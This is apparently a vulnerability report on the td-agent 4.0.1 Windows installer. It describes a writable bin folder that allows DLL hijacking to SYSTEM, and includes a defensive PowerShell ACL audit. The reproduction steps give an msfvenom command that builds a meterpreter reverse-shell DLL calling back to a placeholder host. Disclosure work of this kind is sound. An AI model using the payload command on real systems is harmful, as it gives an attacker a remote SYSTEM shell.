Description
POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges on Windows
To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin
Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADDRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted, or restart the machine from the command line; when the service restarts, it will load the DLL and run as NT AUTHORITY\SYSTEM.
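For triaging a report like this one, the defender-side check is whether the installer left the service's bin directory writable by ordinary users, and where that entry comes from. The following PowerShell script is an added example written for this note; it is not part of the original report or of td-agent. It assumes the path named above (override it with -Path) and audits the directory's DACL for Allow entries that give low-privilege principals any right sufficient to plant or replace a file, then prints an icacls command that restricts the directory to SYSTEM and Administrators.

```powershell
<#
  Added example, not part of the original report: audit the DACL of the td-agent bin
  directory for entries that let low-privilege principals plant or replace files in it.
  Assumes the path reported above; override with -Path. Reading the ACL needs no elevation;
  the remediation command printed at the end must be run from an elevated prompt.
#>
param(
    [string]$Path = 'C:\opt\td-agent\bin'
)

# Well-known SIDs that every interactive or authenticated user belongs to.
# Comparing SIDs instead of names keeps the check correct on localized Windows builds.
$LowPrivSids = @(
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-1-0',       # Everyone
    'S-1-5-4'        # NT AUTHORITY\INTERACTIVE
)

# Rights that are enough to drop a new file (a DLL) into the directory or swap an existing one.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'CreateFiles, WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

$acl = Get-Acl -LiteralPath $Path

# Keep only Allow ACEs for low-privilege principals that carry at least one write-class right.
# Generic rights (e.g. GENERIC_ALL) appear as negative Int32 values; -band still works on them.
$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
    try {
        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
    } catch {
        continue   # unresolvable account (e.g. orphaned SID); not a low-privilege group
    }
    if ($LowPrivSids -notcontains $sid) { continue }
    if (([int]$ace.FileSystemRights -band [int]$WriteMask) -eq 0) { continue }
    [pscustomobject]@{
        Path      = $Path
        Principal = $ace.IdentityReference.Value
        Rights    = $ace.FileSystemRights
        Inherited = $ace.IsInherited   # True means the entry comes from a parent (C:\opt or C:\), not from the installer
    }
}

if (-not $findings) {
    Write-Output "OK: no low-privilege principal can write to $Path"
    return
}

Write-Output "FINDING: $Path is writable by low-privilege principals:"
$findings | Format-Table -AutoSize

# Remediation (run elevated): break inheritance, then grant SYSTEM and Administrators full
# control and everyone else read/execute only. Confirm the service still starts afterwards.
Write-Output 'Suggested fix (run as Administrator):'
Write-Output "icacls `"$Path`" /inheritance:r /grant:r `"SYSTEM:(OI)(CI)F`" `"Administrators:(OI)(CI)F`" `"Users:(OI)(CI)RX`""
```

The Inherited column matters for root-causing: on a default Windows installation, a folder created directly under C:\ inherits a Modify entry for Authenticated Users, so an installer that creates C:\opt without setting an explicit ACL ends up with exactly the condition described in this report. If the flagged entries are inherited, the fix belongs on the parent directory (or the installer should break inheritance as the suggested icacls command does), and the same check should be run against C:\opt and any other directory the service loads binaries from.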
Expected behavior
N/A
Your Environment
Windows10
Your Configuration
Default
Your Error Log
No errors.
Additional context
Please add an appropriate contact method to submit possible vulnerabilities and POC's.